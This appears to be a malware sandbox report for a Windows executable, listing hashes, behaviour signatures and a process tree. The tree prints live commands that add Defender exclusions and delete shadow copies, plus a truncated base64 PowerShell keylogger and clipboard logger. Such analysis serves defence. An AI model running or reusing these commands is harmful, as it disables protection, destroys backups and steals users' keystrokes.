Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    26/06/2024, 20:32

General

  • Target

    2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe

  • Size

    428KB

  • MD5

    2a90a7ccf98e12ba57583e1e012eca18

  • SHA1

    66512ffb8c58d1444622ff64f189cd7db7dbde1d

  • SHA256

    2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8

  • SHA512

    b7fbfbfc94c06337fd7bcf933f73f39d3c1aa7f17b4708e846e4ba64cab59249736e8733b8a627ed5292e568cfd5e0106275cec8b8dded8fd71cb60e285a72e5

  • SSDEEP

    6144:1OYGXaPNxdgSdcq2pVZPOJHAbK/egjnOtOjgndbpZgBJDEFdkYnC:xGqN/XdctpVtkPewnOtHd98EQYC

Malware Config

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Deletes itself 1 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 33 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe
    "C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1944
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c (start /MIN powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:") & (start /MIN wscript.exe /E:jscript 14438590 76 "C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe")
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2736
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2664
      • C:\Windows\SysWOW64\wscript.exe
        wscript.exe /E:jscript 14438590 76 "C:\Users\Admin\AppData\Local\Temp\2bcc8e7439a0170a9adb90d9deeec8675027ac39509a8aea8494700abbdb37b8.exe"
        3⤵
        • Deletes itself
        • Modifies registry class
        • Suspicious behavior: RenamesItself
        • Suspicious use of WriteProcessMemory
        PID:2944
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NonI -W Hidden -Exec Bypass Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2524
        • C:\Windows\SysWOW64\regsvr32.exe
          "C:\Windows\System32\regsvr32.exe" /i /s "C:\Users\Admin\AppData\Local\dynwrapx.dll"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:2872
        • C:\Windows\SysWOW64\vssadmin.exe
          "C:\Windows\System32\vssadmin.exe" Delete Shadows /All /Quiet
          4⤵
          • Interacts with shadow copies
          PID:2888
  • C:\Windows\SysWOW64\wscript.exe
    C:\Windows\SysWOW64\wscript.exe "C:\Users\Admin\AppData\Local\07cfaa2b0.js" 76
    1⤵
    • Process spawned unexpected child process
    • Modifies registry class
    PID:2828
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1992
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc QQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsAdQBzAGkAbgBnACAATQBpAGMAcgBvAHMAbwBmAHQALgBXAGkAbgAzADIAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEkATwA7AHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFcAaQBuAGQAbwB3AHMALgBGAG8AcgBtAHMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEMAbwBsAGwAZQBjAHQAaQBvAG4AcwAuAEcAZQBuAGUAcgBpAGMAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQAOwB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEEAYwBjAGUAcwBzAEMAbwBuAHQAcgBvAGwAOwBuAGEAbQBlAHMAcABhAGMAZQAgAGgAMQB7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABtADIAewBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABpADMAIABhADQAIAA9ACAAagA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAbwA2ACAAagA3ACAAPQAgAHAAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAawA5ACAAPQAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwA7AHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABsADEAMAAgAGcAMQAxADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGwAMQAyADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAG8AMQAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAGkAMQA0ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYAMQA1ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYAMQA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGUAMQA3ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABrADEAOAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYwAxADkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAG8AMgAwADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABqADIAMQA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAcAAyADIAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGIAMgAzADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAcwB0AHIAaQBuAGcAIABsADIANAA7AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAHMAdAByAGkAbgBnACAAYQAyADUAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABzAHQAcgBpAG4AZwAgAGwAMgA2ADsAcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAASQBuAHQAUAB0AHIAIABlADIANwA7AFsAUwB0AHIAdQBjAHQATABhAHkAbwB1AHQAKABMAGEAeQBvAHUAdABLAGkAbgBkAC4AUwBlAHEAdQBlAG4AdABpAGEAbAAsACAAQwBoAGEAcgBTAGUAdAAgAD0AIABDAGgAYQByAFMAZQB0AC4AQQBuAHMAaQApAF0AcAB1AGIAbABpAGMAIABzAHQAcgB1AGMAdAAgAG8AMgA4AHsAcAB1AGIAbABpAGMAIABzAHQAcgBpAG4AZwAgAGcAMgA5ADsAcAB1AGIAbABpAGMAIABJAG4AdABQAHQAcgAgAGQAMwAwADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGwAMwAxADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGsAMwAyADsAcAB1AGIAbABpAGMAIABVAEkAbgB0ADMAMgAgAGwAMwAzADsAWwBNAGEAcgBzAGgAYQBsAEEAcwAoAFUAbgBtAGEAbgBhAGcAZQBkAFQAeQBwAGUALgBCAHkAVgBhAGwAQQByAHIAYQB5ACwAIABTAGkAegBlAEMAbwBuAHMAdAAgAD0AIAAzADYAKQBdAHAAdQBiAGwAaQBjACAAYgB5AHQAZQBbAF0AIABkADMANAA7AH0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAHYAbwBpAGQAIABSAHUAbgAoAGwAMQAwACAAYwAzADUAKQB7AGcAMQAxACAAPQAgAGMAMwA1ADsAZQAxADcAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGMAMQA5ACAAPQAgACIAUwBvAGYAdAB3AGEAcgBlAFwAXABNAGkAYwByAG8AcwBvAGYAdABcAFwAVwBpAG4AZABvAHcAcwBcAFwARABXAE0AIgA7AG8AMgAwACAAPQAgACIASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAXAAiACAAKwAgAGMAMQA5ADsAbAAyADYAIAA9ACAARQBuAHYAaQByAG8AbgBtAGUAbgB0AC4ARwBlAHQARQBuAHYAaQByAG8AbgBtAGUAbgB0AFYAYQByAGkAYQBiAGwAZQAoACIAaABlAHgAOAA7ACIAKQA7AGkAZgAgACgAbAAyADYAIAA9AD0AIABuAHUAbABsACkAIABsADIANgAgAD0AIAAiADEAMgAzADQANQA2ADcAOAAiADsAagAyADEAIAA9ACAAbAAyADYAIAArACAAIgBhACIAOwBwADIAMgAgAD0AIABsADIANgAgACsAIAAiAGQAIgA7AGIAMgAzACAAPQAgAGwAMgA2ACAAKwAgACIAcwAiADsAbAAyADQAIAA9ACAAbAAyADYAIAArACAAIgBtACIAOwB1AGkAbgB0ACAAaAAzADYAIAA9ACAATwBwAGUAbgBNAHUAdABlAHgAKAAwAHgAMAAwADEAMAAwADAAMAAwACwAIABmAGEAbABzAGUALAAgAGwAMgA0ACkAOwBpAGYAIAAoAGgAMwA2ACAAIQA9ACAAMAApACAARQB4AGkAdABQAHIAbwBjAGUAcwBzACgAMAApADsAQwByAGUAYQB0AGUATQB1AHQAZQB4ACgASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIAB0AHIAdQBlACwAIABsADIANAApADsAZQAyADcAIAA9ACAASQBuAHQAUAB0AHIALgBaAGUAcgBvADsAaQBmACAAKABTAEMAYQByAGQARQBzAHQAYQBiAGwAaQBzAGgAQwBvAG4AdABlAHgAdAAoADIALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAASQBuAHQAUAB0AHIALgBaAGUAcgBvACwAIABvAHUAdAAgAGUAMgA3ACkAIAAhAD0AIAAwACkAIABlADIANwAgAD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AOwBrADEAOAAgAD0AIAAiACIAOwBvADEAMwAgAD0AIABHAGUAdABGAG8AcgBlAGcAcgBvAHUAbgBkAFcAaQBuAGQAbwB3ACgAKQA7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAG8AMQAzACkAOwBmADEANgAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKABtADMANwAgACsAIAAxACkAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAbwAxADMALAAgAGYAMQA2ACwAIABtADMANwAgACsAIAAxACkAOwB1AGkAbgB0ACAAaQAxADQAIAA9ACAAMAA7AEcAZQB0AFcAaQBuAGQAbwB3AFQAaAByAGUAYQBkAFAAcgBvAGMAZQBzAHMASQBkACgAbwAxADMALAAgAHIAZQBmACAAaQAxADQAKQA7AFAAcgBvAGMAZQBzAHMAIABlADMAOAAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAGkAMQA0ACkAOwBpAGYAIAAoAGUAMwA4ACAAIQA9ACAAbgB1AGwAbAApACAAYQAyADUAIAA9ACAAZQAzADgALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwAgAGUAbABzAGUAIABhADIANQAgAD0AIAAiACIAOwBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByAC4AWgBlAHIAbwAsACAAMAAsACAAagA3ACwAIABJAG4AdABQAHQAcgAuAFoAZQByAG8ALAAgADAALAAgAEkAbgB0AFAAdAByAC4AWgBlAHIAbwApADsAawA5ACAAPQAgAGkAMwA5ACgAYQA0ACkAOwBBAHAAcABsAGkAYwBhAHQAaQBvAG4ALgBSAHUAbgAoACkAOwBVAG4AaABvAG8AawBXAGkAbgBkAG8AdwBzAEgAbwBvAGsARQB4ACgAawA5ACkAOwB9AHAAcgBpAHYAYQB0AGUAIABzAHQAYQB0AGkAYwAgAEkAbgB0AFAAdAByACAAaQAzADkAKABpADMAIABhADQAKQB7AEkAbgB0AFAAdAByACAAZAA0ADAAIAA9ACAARwBlAHQATQBvAGQAdQBsAGUASABhAG4AZABsAGUAKABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBNAG8AZAB1AGwAZQBOAGEAbQBlACkAOwByAGUAdAB1AHIAbgAgAFMAZQB0AFcAaQBuAGQAbwB3AHMASABvAG8AawBFAHgAKAAxADMALAAgAGEANAAsACAAZAA0ADAALAAgADAAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdgBvAGkAZAAgAG4ANAAxACgAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGYANAAyACwAIABzAHQAcgBpAG4AZwAgAGYANAAzACwAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAagA0ADQAKQB7AHQAcgB5AHsAcwB0AHIAaQBuAGcAIABuADQANQBkAGEAdABhAF8AIAA9ACAAUgBlAGcAaQBzAHQAcgB5AC4ARwBlAHQAVgBhAGwAdQBlACgAbwAyADAALAAgAGoAMgAxACwAIAAiACIAKQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAOwBuADQANQBkAGEAdABhAF8AIAA9ACAAbgA0ADUAZABhAHQAYQBfACAAKwAgAEQAYQB0AGUAVABpAG0AZQAuAE4AbwB3ACAAKwAgACIAIABbACIAIAArACAAZgA0ADIALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACIAXQAgAC0AIAAiACAAKwAgAGYANAAzACAAKwAgACIAXAByAFwAbgAiACAAKwAgAGoANAA0AC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAiAFwAcgBcAG4AXAByAFwAbgAiADsAUgBlAGcAaQBzAHQAcgB5AC4AUwBlAHQAVgBhAGwAdQBlACgAbwAyADAALAAgAGoAMgAxACwAIABuADQANQBkAGEAdABhAF8AKQA7AH0AYwBhAHQAYwBoACAAewAgAH0AfQBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABpAG4AdAAgAGEANAA2ACgASQBuAHQAUAB0AHIAIABnADQANwApAHsAcgBlAHQAdQByAG4AIABNAGEAcgBzAGgAYQBsAC4AUgBlAGEAZABJAG4AdAAzADIAKABnADQANwApADsAfQBwAHIAaQB2AGEAdABlACAAZABlAGwAZQBnAGEAdABlACAASQBuAHQAUAB0AHIAIABpADMAKABpAG4AdAAgAG4ANAA4ACwAIABJAG4AdABQAHQAcgAgAGYANAA5ACwAIABJAG4AdABQAHQAcgAgAG4ANQAwACkAOwBwAHUAYgBsAGkAYwAgAGQAZQBsAGUAZwBhAHQAZQAgAHUAaQBuAHQAIABvADYAKABJAG4AdABQAHQAcgAgAHAAUABhAHIAYQBtACkAOwBwAHUAYgBsAGkAYwAgAGQAZQBsAGUAZwBhAHQAZQAgAHYAbwBpAGQAIABsADEAMAAoACkAOwBwAHIAaQB2AGEAdABlACAAcwB0AGEAdABpAGMAIABJAG4AdABQAHQAcgAgAGoANQAoAGkAbgB0ACAAbgA0ADgALAAgAEkAbgB0AFAAdAByACAAZgA0ADkALAAgAEkAbgB0AFAAdAByACAAbgA1ADAAKQB7AGkAZgAgACgAbgA0ADgAIAA+AD0AIAAwACAAJgAmACAAZgA0ADkAIAA9AD0AIAAoAEkAbgB0AFAAdAByACkAMAB4ADAAMQAwADAAKQB7AGkAbgB0ACAAZQA1ADEAIAA9ACAAYQA0ADYAKABuADUAMAApADsAaQBmACAAKABlADUAMQAgADwAIAA4ACkAIAByAGUAdAB1AHIAbgAgAEMAYQBsAGwATgBlAHgAdABIAG8AbwBrAEUAeAAoAGsAOQAsACAAbgA0ADgALAAgAGYANAA5ACwAIABuADUAMAApADsAZwAxADEAKAApADsAYgBvAG8AbAAgAGEANQAyACAAPQAgACgAZQA1ADEAIAA9AD0AIAA4ACkAOwBiAG8AbwBsACAAZAA1ADMAIAA9ACAAKABlADUAMQAgAD0APQAgADQANgApADsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAgAGoANQA0ACAAPQAgAG4AZQB3ACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AUwB0AHIAaQBuAGcAQgB1AGkAbABkAGUAcgAoACkAOwBiAHkAdABlAFsAXQAgAGcANQA1ACAAIAA9ACAAbgBlAHcAIABiAHkAdABlAFsAMgA1ADUAXQA7AGkAZgAgACgARwBlAHQASwBlAHkAYgBvAGEAcgBkAFMAdABhAHQAZQAoAGcANQA1ACkAKQB7AHUAaQBuAHQAIABqADUANgAgAD0AIABNAGEAcABWAGkAcgB0AHUAYQBsAEsAZQB5ACgAZQA1ADEALAAgADMAKQA7AGwAMQAyACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAdQBpAG4AdAAgAGUANQA3ACAAPQAgADAAOwB1AGkAbgB0ACAAaQA1ADgAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABoAHIAZQBhAGQAUAByAG8AYwBlAHMAcwBJAGQAKABsADEAMgAsACAAcgBlAGYAIABlADUANwApADsAdQBpAG4AdAAgAGgANQA5ACAAPQAgAEcAZQB0AEsAZQB5AGIAbwBhAHIAZABMAGEAeQBvAHUAdAAoAGkANQA4ACkAOwBpAGYAIAAoAGEANQAyACAAfAB8ACAAZAA1ADMAIAB8AHwAIAAoAFQAbwBVAG4AaQBjAG8AZABlAEUAeAAoAGUANQAxACwAIABqADUANgAsACAAZwA1ADUALAAgAGoANQA0ACwAIABqADUANAAuAEMAYQBwAGEAYwBpAHQAeQAsACAAKAB1AGkAbgB0ACkAMAAsACAAaAA1ADkAKQAgAD4AIAAwACkAKQB7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAGwAMQAyACkAOwBmADEANQAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKABtADMANwAgACsAIAAxACkAOwBHAGUAdABXAGkAbgBkAG8AdwBUAGUAeAB0ACgAbAAxADIALAAgAGYAMQA1ACwAIABtADMANwAgACsAIAAxACkAOwBpAGYAIAAoACgAZQA1ADcAIAAhAD0AIABpADEANAApACAAfAB8ACAAKABsADEAMgAgACEAPQAgAG8AMQAzACkAIAB8AHwAIAAoAGYAMQA2AC4AVABvAFMAdAByAGkAbgBnACgAKQAgACEAPQAgAGYAMQA1AC4AVABvAFMAdAByAGkAbgBnACgAKQApACkAewBuADQAMQAoAGYAMQA2ACwAIABhADIANQAsACAAZQAxADcAKQA7AGYAMQA2AC4AUgBlAG0AbwB2AGUAKAAwACwAIABmADEANgAuAEwAZQBuAGcAdABoACkAOwBmADEANgAuAEEAcABwAGUAbgBkACgAZgAxADUAKQA7AGUAMQA3AC4AUgBlAG0AbwB2AGUAKAAwACwAIABlADEANwAuAEwAZQBuAGcAdABoACkAOwBvADEAMwAgAD0AIABsADEAMgA7AFAAcgBvAGMAZQBzAHMAIABlADMAOAAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAGUANQA3ACkAOwBpAGYAIAAoAGUAMwA4ACAAIQA9ACAAbgB1AGwAbAApACAAYQAyADUAIAA9ACAAZQAzADgALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwAgAGUAbABzAGUAIABhADIANQAgAD0AIAAiACIAOwBpADEANAAgAD0AIABlADUANwA7AH0AaQBmACAAKABlADUAMQAgAD4AIAA3ACkAewBpAGYAIAAoAGEANQAyACkAIABlADEANwAuAEEAcABwAGUAbgBkACgAIgBbAKsAXQAiACkAOwBlAGwAcwBlACAAaQBmACAAKABkADUAMwApACAAZQAxADcALgBBAHAAcABlAG4AZAAoACIAWwBkAGUAbABdACIAKQA7AGUAbABzAGUAIABlADEANwAuAEEAcABwAGUAbgBkACgAagA1ADQAKQA7AH0AfQB9AH0AcgBlAHQAdQByAG4AIABDAGEAbABsAE4AZQB4AHQASABvAG8AawBFAHgAKABrADkALAAgAG4ANAA4ACwAIABmADQAOQAsACAAbgA1ADAAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AIABqADYAMAAoAGIAeQB0AGUAWwBdACAAagA2ADEAKQB7AHMAdAByAGkAbgBnACAAbwA2ADIAIAA9ACAARQBuAGMAbwBkAGkAbgBnAC4AQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABqADYAMQApADsAaQBmACAAKABzAHQAcgBpAG4AZwAuAEkAcwBOAHUAbABsAE8AcgBFAG0AcAB0AHkAKABvADYAMgApACkAIAByAGUAdAB1AHIAbgAgAG4AZQB3ACAATABpAHMAdAA8AHMAdAByAGkAbgBnAD4AKAApADsAcgBlAHQAdQByAG4AIABuAGUAdwAgAEwAaQBzAHQAPABzAHQAcgBpAG4AZwA+ACgAbwA2ADIALgBTAHAAbABpAHQAKABuAGUAdwAgAGMAaABhAHIAWwBdACAAewAgACcAXAAwACcAIAB9ACwAIABTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwAuAFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkAKQA7AH0AcAByAGkAdgBhAHQAZQAgAHMAdABhAHQAaQBjACAAdQBpAG4AdAAgAHAAOAAoAEkAbgB0AFAAdAByACAAbQA2ADMAKQB7AGIAbwBvAGwAIABlADYANAAgAD0AIAB0AHIAdQBlADsAcwB0AHIAaQBuAGcAIABtADYANQA7AFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAIABqADYANgAgAD0AIABuAGUAdwAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAKAApADsAdwBoAGkAbABlACAAKABlADYANAApAHsAcwB0AHIAaQBuAGcAIABrADYANwAgAD0AIABSAGUAZwBpAHMAdAByAHkALgBHAGUAdABWAGEAbAB1AGUAKABvADIAMAAsACAAYgAyADMALAAgACIAIgApAC4AVABvAFMAdAByAGkAbgBnACgAKQA7AGkAZgAgACgAawA2ADcAIAAhAD0AIAAiACIAKQB7AFIAZQBnAGkAcwB0AHIAeQBLAGUAeQAgAGkANgA4ACAAPQAgAFIAZQBnAGkAcwB0AHIAeQAuAEMAdQByAHIAZQBuAHQAVQBzAGUAcgAuAE8AcABlAG4AUwB1AGIASwBlAHkAKABjADEAOQAsACAAdAByAHUAZQApADsAaQBmACAAKABpADYAOAAgACEAPQAgAG4AdQBsAGwAKQB7AGkANgA4AC4ARABlAGwAZQB0AGUAVgBhAGwAdQBlACgAYgAyADMAKQA7AGkANgA4AC4AQwBsAG8AcwBlACgAKQA7AH0ARQB4AGkAdABQAHIAbwBjAGUAcwBzACgAMAApADsAfQBpAGYAIAAoAEMAbABpAHAAYgBvAGEAcgBkAC4AQwBvAG4AdABhAGkAbgBzAFQAZQB4AHQAKAApACAAPQA9ACAAdAByAHUAZQApAHsAbQA2ADUAIAA9ACAAQwBsAGkAcABiAG8AYQByAGQALgBHAGUAdABUAGUAeAB0ACgAKQA7AGkAZgAgACgAbQA2ADUAIAAhAD0AIABrADEAOAApAHsAcwB0AHIAaQBuAGcAIABlADYAOQAgAD0AIAAiACIAOwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACAAbQA3ADAAIAA9ACAAbgBlAHcAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBTAHQAcgBpAG4AZwBCAHUAaQBsAGQAZQByACgAKQA7AGwAMQAyACAAPQAgAEcAZQB0AEYAbwByAGUAZwByAG8AdQBuAGQAVwBpAG4AZABvAHcAKAApADsAaQBmACAAKABsADEAMgAgACEAPQAgADAAKQB7AGkAbgB0ACAAbQAzADcAIAA9ACAARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdABMAGUAbgBnAHQAaAAoAGwAMQAyACkAOwBtADcAMAAuAEMAYQBwAGEAYwBpAHQAeQAgAD0AIABtADMANwAgACsAIAAxADsARwBlAHQAVwBpAG4AZABvAHcAVABlAHgAdAAoAGwAMQAyACwAIABtADcAMAAsACAAbQAzADcAIAArACAAMQApADsAdQBpAG4AdAAgAF8AcAByAG8AYwBfAGkAZABfACAAPQAgADAAOwBpAGYAIAAoAEcAZQB0AFcAaQBuAGQAbwB3AFQAaAByAGUAYQBkAFAAcgBvAGMAZQBzAHMASQBkACgAbAAxADIALAAgAHIAZQBmACAAXwBwAHIAbwBjAF8AaQBkAF8AKQAgACEAPQAgADAAKQB7AFAAcgBvAGMAZQBzAHMAIABiADcAMQAgAD0AIABQAHIAbwBjAGUAcwBzAC4ARwBlAHQAUAByAG8AYwBlAHMAcwBCAHkASQBkACgAKABpAG4AdAApAF8AcAByAG8AYwBfAGkAZABfACkAOwBpAGYAIAAoAGIANwAxACAAIQA9ACAAbgB1AGwAbAApACAAZQA2ADkAIAA9ACAAYgA3ADEALgBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwB9AH0AbQA3ADAALgBBAHAAcABlAG4AZAAoACIAIAA6ADoAIABDAGwAaQBwAGIAbwBhAHIAZAAiACkAOwBqADYANgAuAFIAZQBtAG8AdgBlACgAMAAsACAAagA2ADYALgBMAGUAbgBnAHQAaAApADsAagA2ADYALgBBAHAAcABlAG4AZAAoAG0ANgA1ACkAOwBuADQAMQAoAG0ANwAwACwAIABlADYAOQAsACAAagA2ADYAKQA7AGsAMQA4ACAAPQAgAG0ANgA1ADsAfQB9AHMAdAByAGkAbgBnACAAZAA3ADIAIAA9ACAAIgAiADsAbwAyADgAIABsADcAMwA7AGkAZgAgACgAZQAyADcAIAAhAD0AIABJAG4AdABQAHQAcgAuAFoAZQByAG8AKQB7AHUAaQBuAHQAIABnADcANAAgAD0AIAAxADAAMAAwADAAOwBiAHkAdABl